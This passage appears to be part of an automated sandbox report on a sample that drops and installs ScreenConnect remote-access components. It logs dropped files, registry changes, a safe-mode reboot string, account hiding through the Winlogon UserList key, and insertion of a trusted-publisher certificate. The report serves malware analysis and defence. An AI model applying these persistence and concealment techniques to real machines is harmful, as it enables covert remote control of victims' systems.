                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887BDD2A5 pushad ; iretd 1_2_00007FF887BDD2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887CF7362 push cs; retf 485Dh 1_2_00007FF887CF742A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887CF845E push eax; ret 1_2_00007FF887CF846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887CF842E pushad ; ret 1_2_00007FF887CF845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887CF00BD pushad ; iretd 1_2_00007FF887CF00C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887D08D47 push 8B495CDEh; iretd 1_2_00007FF887D08D4C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF887CF7D00 push eax; retf 1_2_00007FF887CF7D1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FF887CC30BA push eax; iretd 10_2_00007FF887CC30BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FF887CC401A push eax; iretd 10_2_00007FF887CC401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FF887CC2FDA pushad ; retf 10_2_00007FF887CC2FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FF887CC3F3A pushad ; retf 10_2_00007FF887CC3F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE2966 push esi; iretd 13_2_00007FF887FE296D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE2207 push esi; iretd 13_2_00007FF887FE2208
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE228B push esi; iretd 13_2_00007FF887FE228C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE2385 push esi; iretd 13_2_00007FF887FE2386
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE2CC7 push edi; iretd 13_2_00007FF887FE2CC8
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE7D84 push ss; iretd 13_2_00007FF887FE7D85
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE67DD push edi; iretd 13_2_00007FF887FE689F
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 13_2_00007FF887FE1FEC push esi; iretd 13_2_00007FF887FE1FED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.exe
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ff0619b3-cdda-4e74-9760-149d39b5b1c0)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1764722786.0000000002F42000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2595768885.0000000000D20000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2596143693.0000000002711000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Memory allocated: 1674C7F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Memory allocated: 16765F40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, Memory allocated: 1140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, Memory allocated: 1AC80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Memory allocated: 1310000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Memory allocated: 31B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Memory allocated: 2FC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Memory allocated: 1800000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Memory allocated: 19F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe, Memory allocated: 39F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, Memory allocated: CE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe, Memory allocated: 1A710000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 599765
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 599652
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 599516
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 599394
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 598625
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 598293
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 598172
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 598061
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597939
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597800
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597672
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597547
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597421
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597311
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597202
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 597094
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596984
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596875
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596765
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596656
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596546
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596437
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596327
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596210
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 596109
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595917
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595806
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595666
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595547
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595437
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595327
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595218
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595109
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 595000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 594891
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 594766
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 594641
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 594531
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 594421
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Thread delayed: delay time: 594312
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593361Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593182Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592577Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3256Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6377Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
